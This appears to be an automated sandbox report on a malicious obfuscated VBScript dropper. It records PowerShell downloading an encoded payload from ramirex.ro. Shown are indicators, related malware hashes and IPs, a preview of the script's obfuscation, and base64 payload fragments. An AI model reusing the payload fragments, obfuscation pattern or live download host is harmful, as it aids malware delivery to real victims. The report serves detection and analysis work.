          • EGA enabled
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Sample name:IMG-35235235523525235252532535Selvfinansieret.vbs
          Detection:MAL
          Classification:mal100.troj.expl.evad.winVBS@6/4@1/1
          EGA Information:Failed
          HCA Information:
          • Successful, ratio: 100%
          • Number of executed functions: 7
          • Number of non-executed functions: 4
          Cookbook Comments:
          • Found application associated with file extension: .vbs
          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
          • Execution Graph export aborted for target powershell.exe, PID 2664 because it is empty
          • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
          • Not all processes where analyzed, report is missing behavior information
          • Report size getting too big, too many NtOpenKeyEx calls found.
          • Report size getting too big, too many NtProtectVirtualMemory calls found.
          • Report size getting too big, too many NtQueryValueKey calls found.
          TimeTypeDescription
          02:08:56API Interceptor46x Sleep call for process: powershell.exe modified
          No context
          No context
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          WEBCLASSITROBM-FM_NR.24040718PDF.exeGet hashmaliciousFormBook, GuLoaderBrowse
          • 37.251.143.215
          nOrden_de_compra.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
          • 89.32.46.159
          Project_Offer_2024.exeGet hashmaliciousAgentTeslaBrowse
          • 89.32.46.159
          ndHq.exeGet hashmaliciousAgentTeslaBrowse
          • 89.32.46.159
          arm7-20240101-1250.elfGet hashmaliciousMiraiBrowse
          • 37.251.157.173
          MS Document.htmlGet hashmaliciousPhisherBrowse
          • 37.251.137.194
          3m37SZRkdC.elfGet hashmaliciousMiraiBrowse
          • 37.251.157.145
          meerkat.x86.elfGet hashmaliciousMiraiBrowse
          • 37.251.157.141
          1x9SsU5xOL.elfGet hashmaliciousMiraiBrowse
          • 37.251.157.133
          73IQC7zT52.elfGet hashmaliciousMirai, MoobotBrowse
          • 37.251.157.188
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          3b5074b1b5d032e5620f69f9f700ff0eCompany Profile.PDF.exeGet hashmaliciousAgentTeslaBrowse
          • 188.215.50.15
          b86258bbf5182d3da8292cbff6262a90cef9dd418fd8b6706fde5747662da2ae_dump.bin.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
          • 188.215.50.15
          oxi.ps1Get hashmaliciousDarkGate, MailPassViewBrowse
          • 188.215.50.15
          http://corporativoentornomedico.com/natwes/natwest3/details.phpGet hashmaliciousUnknownBrowse
          • 188.215.50.15
          https://centroingles.com.ar/pf/potfinance/login.phpGet hashmaliciousUnknownBrowse
          • 188.215.50.15
          Puchase.jsGet hashmaliciousAgentTeslaBrowse
          • 188.215.50.15
          Shipping Documents inv. 523435300XX.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
          • 188.215.50.15
          oxi.ps1Get hashmaliciousDarkGate, MailPassViewBrowse
          • 188.215.50.15
          http://see-track.com/Get hashmaliciousUnknownBrowse
          • 188.215.50.15
          Doc_10577030xls.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
          • 188.215.50.15
          No context
          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          File Type:data
          Category:dropped
          Size (bytes):64
          Entropy (8bit):1.1940658735648508
          Encrypted:false
          SSDEEP:3:Nlllul/nq/llh:NllUyt
          MD5:AB80AD9A08E5B16132325DF5584B2CBE
          SHA1:F7411B7A5826EE6B139EBF40A7BEE999320EF923
          SHA-256:5FBE5D71CECADD2A3D66721019E68DD78C755AA39991A629AE81C77B531733A4
          SHA-512:9DE2FB33C0EA36E1E174850AD894659D6B842CD624C1A543B2D391C8EBC74719F47FA88D0C4493EA820611260364C979C9CDF16AF1C517132332423CA0CB7654
          Malicious:false
          Reputation:moderate, very likely benign file
          Preview:@...e................................................@..........
          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          File Type:ASCII text, with no line terminators
          Category:dropped
          Size (bytes):60
          Entropy (8bit):4.038920595031593
          Encrypted:false
          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
          MD5:D17FE0A3F47BE24A6453E9EF58C94641
          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
          Malicious:false
          Reputation:high, very likely benign file
          Preview:# PowerShell test file to determine AppLocker lockdown mode
          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          File Type:ASCII text, with no line terminators
          Category:dropped
          Size (bytes):60
          Entropy (8bit):4.038920595031593
          Encrypted:false
          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
          MD5:D17FE0A3F47BE24A6453E9EF58C94641
          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
          Malicious:false
          Reputation:high, very likely benign file
          Preview:# PowerShell test file to determine AppLocker lockdown mode
          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          File Type:ASCII text, with very long lines (65536), with no line terminators
          Category:dropped
          Size (bytes):393216
          Entropy (8bit):5.964352319625788
          Encrypted:false
          SSDEEP:6144:U9Rk1UTdV0+vK43TRe8w1ESVbQiH19dogc1AextsFWWrOeutAF0LNyQw:QQie+vKoTR31KQiVzINxbW6BiOkQw
          MD5:1E4C3183865F00292E4EC27F5D274FEA
          SHA1:4681A96102079FC9E3B87724CF05F496B9A2D539
          SHA-256:39B622ABB4AA40D6CE21A9A7E96CD4456C726CAB285B8E8496EBC396A4AEBF24
          SHA-512:97F5985296DE2E5B6299BDEC98DC4C4E81D4E39BBB23250BA3D95E5DD1382D9EB471DA89557FEC9CEDAA639D9646B73B32BCE0993454E68989E17C893B9673C4
          Malicious:false
          Reputation:low
          Preview:6wLNMOsCEni7yBoUAHEBm+sC6soDXCQEcQGb6wI2mLnad/+acQGb6wIWnoHpSbqfrHEBm+sCR8CB6ZG9X+5xAZvrAlMT6wIWTusCC4u6WePEkusCK/pxAZtxAZtxAZsxynEBm+sCqwqJFAvrAqx8cQGb0eLrAj1C6wI2m4PBBOsCeEzrAklagfn45xYEfMrrAhE+6wKgZotEJATrAnGT6wIErInD6wKLr3EBm4HD2ok5A3EBm3EBm7rayIT3cQGbcQGbgeoyqdHpcQGb6wJzG4HCWOBM8usChc3rAldN6wLzUHEBm+sCS19xAZuLDBDrAltv6wKrZIkME+sCPizrAszMQusCmEvrAgo6gfqwaAQAddJxAZtxAZuJXCQM6wIN/XEBm4HtAAMAAHEBm3EBm4tUJAhxAZtxAZuLfCQEcQGbcQGbievrAvkz6wLcWIHDnAAAAHEBm3EBm1PrAkrG6wJBCWpAcQGb6wIw0onrcQGb6wJNjceDAAEAAAAQLgTrAiYocQGbgcMAAQAA6wLRwOsCGwlT6wJRyusCdfaJ6+sCXN9xAZuJuwQBAABxAZvrAh6agcMEAQAA6wIY7nEBm1NxAZvrApOCav9xAZtxAZuDwgVxAZvrAsHqMfbrAmazcQGbMclxAZvrAo9bixrrAsf0cQGbQXEBm3EBmzkcCnX0cQGb6wLg/EbrAssTcQGbgHwK+7h13usCkf1xAZuLRAr8cQGbcQGbKfBxAZvrArPc/9LrAvy2cQGburBoBADrAmIFcQGbMcDrAhM96wI90It8JAxxAZtxAZuBNAeEfsNG6wIBSusCKVqDwATrAo0y6wJzWDnQdeLrAt5ZcQGbifvrAlE26wLc3P/X6wLFpXEBm3K9Hs9huYb5dxeofAULfAChsn7H6cGSj9Z/Qis7GkMSAjI8CzsLORMNm6XDX8cclOudR6MFv5aFhUpCt9w72Pq9tUK38K2p7eL7ELFGAjcb/LmHS4TCx2iMRxLH
          File type:ASCII text, with CRLF line terminators
          Entropy (8bit):4.521499470798273
          TrID:
          • Visual Basic Script (13500/0) 100.00%
          File name:IMG-35235235523525235252532535Selvfinansieret.vbs
          File size:20'681 bytes
          MD5:a6cf7a17bac5acfed8b42dae16767f8e
          SHA1:2f9499cee74dfb887b549c5766c4f5dfec9743e0
          SHA256:412da635eb16946ae92c0648efe4f687771f3625eedeacd3f2889862ed492658
          SHA512:513888bfb57737aa4986aad18b638b6b4ecab5c9e1c28ab802de01bbb6d1d13cc07c458a7d676f14a8f554d6e965b1c586b7e2023681aabf6de1e48899cfa96b
          SSDEEP:192:EfdXmXLS7d8zaEvBwLQZ9HAkDsDoIZQe8x2cKnl7jlC17UvpMp1TI5Q/Q2Tn0ejF:EUg1uco3aVWUafIi42TnFjF
          TLSH:D392FB9CA7E35AF08BB43E598486BCB8F7724E11C510B4CD3D2C97BA24322479E0759D
          File Content Preview:.. ......Function Etageejendom(Cathected)....Etageejendom = ChrW(Cathected)....End Function .... ..Forstrkningsbjlkerne = 0.... ..Indpak= array(71-1+0,69,77,59,72,73,62,59,66,66).... ....T0 = Simiousness79 .... ..Dim Waveform.... ..for Stikningerne=0
          Icon Hash:68d69b8f86ab9a86
          TimestampSource PortDest PortSource IPDest IP
          May 28, 2024 08:08:58.199728012 CEST49699443192.168.2.6188.215.50.15
          May 28, 2024 08:08:58.199764967 CEST44349699188.215.50.15192.168.2.6
          May 28, 2024 08:08:58.199939013 CEST49699443192.168.2.6188.215.50.15
          May 28, 2024 08:08:58.208775043 CEST49699443192.168.2.6188.215.50.15
          May 28, 2024 08:08:58.208795071 CEST44349699188.215.50.15192.168.2.6
          May 28, 2024 08:08:59.139456987 CEST44349699188.215.50.15192.168.2.6
          May 28, 2024 08:08:59.139693975 CEST49699443192.168.2.6188.215.50.15
          May 28, 2024 08:08:59.143028975 CEST49699443192.168.2.6188.215.50.15
          May 28, 2024 08:08:59.143039942 CEST44349699188.215.50.15192.168.2.6
          May 28, 2024 08:08:59.143445969 CEST44349699188.215.50.15192.168.2.6
          May 28, 2024 08:08:59.154046059 CEST49699443192.168.2.6188.215.50.15
          May 28, 2024 08:08:59.198493958 CEST44349699188.215.50.15192.168.2.6
          May 28, 2024 08:08:59.371201038 CEST44349699188.215.50.15192.168.2.6
          May 28, 2024 08:08:59.421689987 CEST49699443192.168.2.6188.215.50.15
          May 28, 2024 08:08:59.488245010 CEST44349699188.215.50.15192.168.2.6
          May 28, 2024 08:08:59.488281012 CEST44349699188.215.50.15192.168.2.6
          May 28, 2024 08:08:59.488297939 CEST44349699188.215.50.15192.168.2.6
          May 28, 2024 08:08:59.488347054 CEST44349699188.215.50.15192.168.2.6
          May 28, 2024 08:08:59.488367081 CEST44349699188.215.50.15192.168.2.6
          May 28, 2024 08:08:59.488434076 CEST49699443192.168.2.6188.215.50.15
          May 28, 2024 08:08:59.488447905 CEST44349699188.215.50.15192.168.2.6
          May 28, 2024 08:08:59.488571882 CEST49699443192.168.2.6188.215.50.15
          May 28, 2024 08:08:59.596538067 CEST44349699188.215.50.15192.168.2.6
          May 28, 2024 08:08:59.596606016 CEST44349699188.215.50.15192.168.2.6
          May 28, 2024 08:08:59.596653938 CEST49699443192.168.2.6188.215.50.15
          May 28, 2024 08:08:59.596662998 CEST44349699188.215.50.15192.168.2.6
          May 28, 2024 08:08:59.596687078 CEST49699443192.168.2.6188.215.50.15
          May 28, 2024 08:08:59.596698999 CEST49699443192.168.2.6188.215.50.15
          May 28, 2024 08:08:59.597228050 CEST44349699188.215.50.15192.168.2.6
          May 28, 2024 08:08:59.597279072 CEST44349699188.215.50.15192.168.2.6
          May 28, 2024 08:08:59.597301006 CEST49699443192.168.2.6188.215.50.15
          May 28, 2024 08:08:59.597309113 CEST44349699188.215.50.15192.168.2.6
          May 28, 2024 08:08:59.597337008 CEST49699443192.168.2.6188.215.50.15
          May 28, 2024 08:08:59.597356081 CEST49699443192.168.2.6188.215.50.15
          May 28, 2024 08:08:59.710968018 CEST44349699188.215.50.15192.168.2.6
          May 28, 2024 08:08:59.711003065 CEST44349699188.215.50.15192.168.2.6
          May 28, 2024 08:08:59.711072922 CEST49699443192.168.2.6188.215.50.15
          May 28, 2024 08:08:59.711108923 CEST44349699188.215.50.15192.168.2.6
          May 28, 2024 08:08:59.711141109 CEST49699443192.168.2.6188.215.50.15
          May 28, 2024 08:08:59.711163044 CEST49699443192.168.2.6188.215.50.15
          May 28, 2024 08:08:59.823909044 CEST44349699188.215.50.15192.168.2.6
          May 28, 2024 08:08:59.823931932 CEST44349699188.215.50.15192.168.2.6
          May 28, 2024 08:08:59.824146986 CEST49699443192.168.2.6188.215.50.15
          May 28, 2024 08:08:59.824173927 CEST44349699188.215.50.15192.168.2.6
          May 28, 2024 08:08:59.824265003 CEST49699443192.168.2.6188.215.50.15
          May 28, 2024 08:08:59.825515032 CEST44349699188.215.50.15192.168.2.6
          May 28, 2024 08:08:59.825535059 CEST44349699188.215.50.15192.168.2.6
          May 28, 2024 08:08:59.825591087 CEST49699443192.168.2.6188.215.50.15
          May 28, 2024 08:08:59.825599909 CEST44349699188.215.50.15192.168.2.6
          May 28, 2024 08:08:59.825644970 CEST49699443192.168.2.6188.215.50.15
          May 28, 2024 08:08:59.937716961 CEST44349699188.215.50.15192.168.2.6
          May 28, 2024 08:08:59.937748909 CEST44349699188.215.50.15192.168.2.6
          May 28, 2024 08:08:59.937839985 CEST49699443192.168.2.6188.215.50.15
          May 28, 2024 08:08:59.937855005 CEST44349699188.215.50.15192.168.2.6
          May 28, 2024 08:08:59.937902927 CEST49699443192.168.2.6188.215.50.15
          May 28, 2024 08:08:59.938952923 CEST44349699188.215.50.15192.168.2.6
          May 28, 2024 08:08:59.938981056 CEST44349699188.215.50.15192.168.2.6
          May 28, 2024 08:08:59.939038992 CEST49699443192.168.2.6188.215.50.15
          May 28, 2024 08:08:59.939047098 CEST44349699188.215.50.15192.168.2.6
          May 28, 2024 08:08:59.939132929 CEST49699443192.168.2.6188.215.50.15
          May 28, 2024 08:08:59.988143921 CEST44349699188.215.50.15192.168.2.6
          May 28, 2024 08:08:59.988184929 CEST44349699188.215.50.15192.168.2.6
          May 28, 2024 08:08:59.988240957 CEST49699443192.168.2.6188.215.50.15
          May 28, 2024 08:08:59.988251925 CEST44349699188.215.50.15192.168.2.6
          May 28, 2024 08:08:59.988280058 CEST49699443192.168.2.6188.215.50.15
          May 28, 2024 08:08:59.988305092 CEST49699443192.168.2.6188.215.50.15
          May 28, 2024 08:09:00.052108049 CEST44349699188.215.50.15192.168.2.6
          May 28, 2024 08:09:00.052170038 CEST44349699188.215.50.15192.168.2.6
          May 28, 2024 08:09:00.052200079 CEST49699443192.168.2.6188.215.50.15
          May 28, 2024 08:09:00.052210093 CEST44349699188.215.50.15192.168.2.6
          May 28, 2024 08:09:00.052246094 CEST49699443192.168.2.6188.215.50.15
          May 28, 2024 08:09:00.052256107 CEST49699443192.168.2.6188.215.50.15
          May 28, 2024 08:09:00.052896023 CEST44349699188.215.50.15192.168.2.6
          May 28, 2024 08:09:00.052947998 CEST44349699188.215.50.15192.168.2.6
          May 28, 2024 08:09:00.052978992 CEST49699443192.168.2.6188.215.50.15
          May 28, 2024 08:09:00.052989960 CEST44349699188.215.50.15192.168.2.6
          May 28, 2024 08:09:00.053065062 CEST49699443192.168.2.6188.215.50.15
          May 28, 2024 08:09:00.053065062 CEST49699443192.168.2.6188.215.50.15
          May 28, 2024 08:09:00.053735971 CEST44349699188.215.50.15192.168.2.6
          May 28, 2024 08:09:00.053785086 CEST44349699188.215.50.15192.168.2.6
          May 28, 2024 08:09:00.053817987 CEST49699443192.168.2.6188.215.50.15
          May 28, 2024 08:09:00.053832054 CEST44349699188.215.50.15192.168.2.6
          May 28, 2024 08:09:00.053850889 CEST49699443192.168.2.6188.215.50.15
          May 28, 2024 08:09:00.053935051 CEST49699443192.168.2.6188.215.50.15
          May 28, 2024 08:09:00.166321993 CEST44349699188.215.50.15192.168.2.6
          May 28, 2024 08:09:00.166383982 CEST44349699188.215.50.15192.168.2.6
          May 28, 2024 08:09:00.166553974 CEST49699443192.168.2.6188.215.50.15
          May 28, 2024 08:09:00.166575909 CEST44349699188.215.50.15192.168.2.6
          May 28, 2024 08:09:00.166594982 CEST49699443192.168.2.6188.215.50.15
          May 28, 2024 08:09:00.166651964 CEST49699443192.168.2.6188.215.50.15
          May 28, 2024 08:09:00.167072058 CEST44349699188.215.50.15192.168.2.6
          May 28, 2024 08:09:00.167124033 CEST44349699188.215.50.15192.168.2.6
          May 28, 2024 08:09:00.167152882 CEST49699443192.168.2.6188.215.50.15
          May 28, 2024 08:09:00.167160988 CEST44349699188.215.50.15192.168.2.6
          May 28, 2024 08:09:00.167190075 CEST49699443192.168.2.6188.215.50.15
          May 28, 2024 08:09:00.167217970 CEST49699443192.168.2.6188.215.50.15
          May 28, 2024 08:09:00.167614937 CEST44349699188.215.50.15192.168.2.6
          May 28, 2024 08:09:00.167659998 CEST44349699188.215.50.15192.168.2.6
          May 28, 2024 08:09:00.167690992 CEST49699443192.168.2.6188.215.50.15
          May 28, 2024 08:09:00.167697906 CEST44349699188.215.50.15192.168.2.6
          May 28, 2024 08:09:00.167720079 CEST49699443192.168.2.6188.215.50.15
          May 28, 2024 08:09:00.167742014 CEST49699443192.168.2.6188.215.50.15
          May 28, 2024 08:09:00.168380976 CEST44349699188.215.50.15192.168.2.6
          May 28, 2024 08:09:00.168423891 CEST44349699188.215.50.15192.168.2.6
          May 28, 2024 08:09:00.168448925 CEST49699443192.168.2.6188.215.50.15
          May 28, 2024 08:09:00.168454885 CEST44349699188.215.50.15192.168.2.6
          May 28, 2024 08:09:00.168481112 CEST49699443192.168.2.6188.215.50.15
          May 28, 2024 08:09:00.168492079 CEST49699443192.168.2.6188.215.50.15
          May 28, 2024 08:09:00.280456066 CEST44349699188.215.50.15192.168.2.6
          May 28, 2024 08:09:00.280519962 CEST44349699188.215.50.15192.168.2.6
          May 28, 2024 08:09:00.280783892 CEST49699443192.168.2.6188.215.50.15
          May 28, 2024 08:09:00.280817986 CEST44349699188.215.50.15192.168.2.6
          May 28, 2024 08:09:00.280895948 CEST49699443192.168.2.6188.215.50.15
          May 28, 2024 08:09:00.281127930 CEST44349699188.215.50.15192.168.2.6
          May 28, 2024 08:09:00.281171083 CEST44349699188.215.50.15192.168.2.6
          May 28, 2024 08:09:00.281208038 CEST49699443192.168.2.6188.215.50.15
          May 28, 2024 08:09:00.281217098 CEST44349699188.215.50.15192.168.2.6
          May 28, 2024 08:09:00.281254053 CEST49699443192.168.2.6188.215.50.15
          May 28, 2024 08:09:00.281264067 CEST49699443192.168.2.6188.215.50.15
          May 28, 2024 08:09:00.281697989 CEST44349699188.215.50.15192.168.2.6
          May 28, 2024 08:09:00.281749010 CEST44349699188.215.50.15192.168.2.6
          May 28, 2024 08:09:00.281776905 CEST49699443192.168.2.6188.215.50.15
          May 28, 2024 08:09:00.281784058 CEST44349699188.215.50.15192.168.2.6
          May 28, 2024 08:09:00.281814098 CEST49699443192.168.2.6188.215.50.15
          May 28, 2024 08:09:00.281824112 CEST49699443192.168.2.6188.215.50.15
          May 28, 2024 08:09:00.282568932 CEST44349699188.215.50.15192.168.2.6
          May 28, 2024 08:09:00.282624006 CEST44349699188.215.50.15192.168.2.6
          May 28, 2024 08:09:00.282664061 CEST49699443192.168.2.6188.215.50.15
          May 28, 2024 08:09:00.282670975 CEST44349699188.215.50.15192.168.2.6
          May 28, 2024 08:09:00.282685995 CEST49699443192.168.2.6188.215.50.15
          May 28, 2024 08:09:00.282711983 CEST49699443192.168.2.6188.215.50.15
          May 28, 2024 08:09:00.393713951 CEST44349699188.215.50.15192.168.2.6
          May 28, 2024 08:09:00.393779039 CEST44349699188.215.50.15192.168.2.6
          May 28, 2024 08:09:00.393951893 CEST49699443192.168.2.6188.215.50.15
          May 28, 2024 08:09:00.393986940 CEST44349699188.215.50.15192.168.2.6
          May 28, 2024 08:09:00.394010067 CEST49699443192.168.2.6188.215.50.15
          May 28, 2024 08:09:00.394057989 CEST49699443192.168.2.6188.215.50.15
          May 28, 2024 08:09:00.394197941 CEST44349699188.215.50.15192.168.2.6
          May 28, 2024 08:09:00.394248962 CEST44349699188.215.50.15192.168.2.6
          May 28, 2024 08:09:00.394310951 CEST49699443192.168.2.6188.215.50.15
          May 28, 2024 08:09:00.394320965 CEST44349699188.215.50.15192.168.2.6
          May 28, 2024 08:09:00.394361973 CEST49699443192.168.2.6188.215.50.15
          May 28, 2024 08:09:00.394401073 CEST49699443192.168.2.6188.215.50.15
          May 28, 2024 08:09:00.395493984 CEST44349699188.215.50.15192.168.2.6
          May 28, 2024 08:09:00.395524979 CEST44349699188.215.50.15192.168.2.6
          May 28, 2024 08:09:00.395637035 CEST49699443192.168.2.6188.215.50.15
          May 28, 2024 08:09:00.395647049 CEST44349699188.215.50.15192.168.2.6
          May 28, 2024 08:09:00.395740986 CEST49699443192.168.2.6188.215.50.15
          May 28, 2024 08:09:00.398328066 CEST44349699188.215.50.15192.168.2.6
          May 28, 2024 08:09:00.398351908 CEST44349699188.215.50.15192.168.2.6
          May 28, 2024 08:09:00.398469925 CEST49699443192.168.2.6188.215.50.15
          May 28, 2024 08:09:00.398479939 CEST44349699188.215.50.15192.168.2.6
          May 28, 2024 08:09:00.398572922 CEST49699443192.168.2.6188.215.50.15
          May 28, 2024 08:09:00.629870892 CEST44349699188.215.50.15192.168.2.6
          May 28, 2024 08:09:00.629996061 CEST44349699188.215.50.15192.168.2.6
          May 28, 2024 08:09:00.630271912 CEST49699443192.168.2.6188.215.50.15
          May 28, 2024 08:09:00.639472961 CEST49699443192.168.2.6188.215.50.15
          May 28, 2024 08:09:00.639516115 CEST44349699188.215.50.15192.168.2.6
          TimestampSource PortDest PortSource IPDest IP
          May 28, 2024 08:08:58.127305031 CEST5364253192.168.2.61.1.1.1
          May 28, 2024 08:08:58.194695950 CEST53536421.1.1.1192.168.2.6
          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
          May 28, 2024 08:08:58.127305031 CEST192.168.2.61.1.1.10x43cfStandard query (0)ramirex.roA (IP address)IN (0x0001)false
          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
          May 28, 2024 08:08:58.194695950 CEST1.1.1.1192.168.2.60x43cfNo error (0)ramirex.ro188.215.50.15A (IP address)IN (0x0001)false
          • ramirex.ro
          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          0192.168.2.649699188.215.50.154432664C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          TimestampBytes transferredDirectionData
          2024-05-28 06:08:59 UTC170OUTGET /unprincipled.sea HTTP/1.1
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
          Host: ramirex.ro
          Connection: Keep-Alive
          2024-05-28 06:08:59 UTC342INHTTP/1.1 200 OK
          Date: Tue, 28 May 2024 06:08:58 GMT
          Server: Apache/2.2.34 (Unix) mod_ssl/2.2.34 OpenSSL/1.0.1e-fips mod_bwlimited/1.4 mod_qos/11.5 mod_fcgid/2.3.9
          Last-Modified: Sun, 26 May 2024 13:35:09 GMT
          ETag: "26600d8-67280-6195b78317f1c"
          Accept-Ranges: bytes
          Content-Length: 422528
          Connection: close
          Content-Type: text/plain
          2024-05-28 06:08:59 UTC16384INData Raw: 36 77 4c 4e 4d 4f 73 43 45 6e 69 37 79 42 6f 55 41 48 45 42 6d 2b 73 43 36 73 6f 44 58 43 51 45 63 51 47 62 36 77 49 32 6d 4c 6e 61 64 2f 2b 61 63 51 47 62 36 77 49 57 6e 6f 48 70 53 62 71 66 72 48 45 42 6d 2b 73 43 52 38 43 42 36 5a 47 39 58 2b 35 78 41 5a 76 72 41 6c 4d 54 36 77 49 57 54 75 73 43 43 34 75 36 57 65 50 45 6b 75 73 43 4b 2f 70 78 41 5a 74 78 41 5a 74 78 41 5a 73 78 79 6e 45 42 6d 2b 73 43 71 77 71 4a 46 41 76 72 41 71 78 38 63 51 47 62 30 65 4c 72 41 6a 31 43 36 77 49 32 6d 34 50 42 42 4f 73 43 65 45 7a 72 41 6b 6c 61 67 66 6e 34 35 78 59 45 66 4d 72 72 41 68 45 2b 36 77 4b 67 5a 6f 74 45 4a 41 54 72 41 6e 47 54 36 77 49 45 72 49 6e 44 36 77 4b 4c 72 33 45 42 6d 34 48 44 32 6f 6b 35 41 33 45 42 6d 33 45 42 6d 37 72 61 79 49 54 33 63 51 47
          Data Ascii: 6wLNMOsCEni7yBoUAHEBm+sC6soDXCQEcQGb6wI2mLnad/+acQGb6wIWnoHpSbqfrHEBm+sCR8CB6ZG9X+5xAZvrAlMT6wIWTusCC4u6WePEkusCK/pxAZtxAZtxAZsxynEBm+sCqwqJFAvrAqx8cQGb0eLrAj1C6wI2m4PBBOsCeEzrAklagfn45xYEfMrrAhE+6wKgZotEJATrAnGT6wIErInD6wKLr3EBm4HD2ok5A3EBm3EBm7rayIT3cQG
          2024-05-28 06:08:59 UTC16384INData Raw: 41 41 41 6f 41 41 41 6f 41 41 41 6f 41 41 41 6f 41 41 41 6f 41 41 41 6f 41 41 41 6f 41 41 41 6f 41 41 41 6f 41 41 41 6f 41 41 41 6f 41 41 41 6f 41 41 41 6f 41 41 41 6f 41 41 41 6f 41 41 41 6f 41 41 41 6f 41 41 41 6f 41 41 41 6f 69 69 67 52 52 71 2b 52 32 64 74 61 6b 72 30 73 37 7a 4a 55 30 6b 70 57 58 54 61 4c 32 37 45 48 55 68 55 42 53 61 34 37 4d 47 51 70 52 62 58 38 35 66 64 38 4b 45 34 46 7a 35 4c 2f 47 4c 66 77 48 51 57 2f 2b 39 62 6d 34 6b 4b 76 50 34 55 7a 55 41 57 50 31 6b 2b 62 75 30 4b 33 69 43 68 35 59 39 54 69 53 71 61 46 64 6c 34 67 76 59 57 33 56 78 70 62 44 46 30 64 44 30 4d 38 76 43 47 63 45 5a 62 57 79 77 43 2b 67 76 46 2b 56 43 5a 47 6e 4e 31 78 77 6c 57 37 66 73 50 2b 44 56 70 34 4b 61 71 37 6e 45 43 30 6f 78 44 58 63 62 50 57 58 50 4a
          Data Ascii: AAAoAAAoAAAoAAAoAAAoAAAoAAAoAAAoAAAoAAAoAAAoAAAoAAAoAAAoAAAoAAAoAAAoAAAoAAAoiigRRq+R2dtakr0s7zJU0kpWXTaL27EHUhUBSa47MGQpRbX85fd8KE4Fz5L/GLfwHQW/+9bm4kKvP4UzUAWP1k+bu0K3iCh5Y9TiSqaFdl4gvYW3VxpbDF0dD0M8vCGcEZbWywC+gvF+VCZGnN1xwlW7fsP+DVp4Kaq7nEC0oxDXcbPWXPJ
          2024-05-28 06:08:59 UTC16384INData Raw: 31 63 41 46 75 42 65 4b 51 6b 5a 43 73 4e 6f 36 43 31 41 4e 65 41 45 66 55 6d 5a 59 78 4b 6d 48 51 51 68 2f 42 65 63 53 5a 43 6f 6d 62 6b 66 58 4f 42 69 78 7a 75 35 42 68 6b 73 48 4e 66 41 77 6c 66 67 78 38 36 6a 47 42 59 68 74 58 62 6e 4c 51 72 43 66 36 5a 56 7a 31 75 4a 4b 70 49 31 4d 58 73 4a 46 42 73 6c 4b 6c 6b 54 31 31 52 57 5a 31 34 6f 47 51 6d 57 77 4f 34 6d 54 70 5a 54 70 54 71 41 58 73 66 4f 59 78 54 51 42 34 4c 79 6b 6d 53 41 42 76 5a 31 7a 4a 57 79 5a 63 49 74 2f 4d 79 75 45 66 6c 59 53 52 45 31 55 76 2b 2b 2f 73 53 44 78 77 70 66 64 4e 61 78 44 50 69 6c 48 78 4d 30 42 67 38 4a 47 68 48 46 48 36 6e 4a 39 77 38 38 42 6e 38 4a 47 68 50 58 45 46 67 2f 37 49 6b 65 45 66 70 50 2b 4e 30 62 68 46 72 48 6c 46 75 48 62 53 35 70 72 35 2f 50 32 51 67 61
          Data Ascii: 1cAFuBeKQkZCsNo6C1ANeAEfUmZYxKmHQQh/BecSZCombkfXOBixzu5BhksHNfAwlfgx86jGBYhtXbnLQrCf6ZVz1uJKpI1MXsJFBslKlkT11RWZ14oGQmWwO4mTpZTpTqAXsfOYxTQB4LykmSABvZ1zJWyZcIt/MyuEflYSRE1Uv++/sSDxwpfdNaxDPilHxM0Bg8JGhHFH6nJ9w88Bn8JGhPXEFg/7IkeEfpP+N0bhFrHlFuHbS5pr5/P2Qga
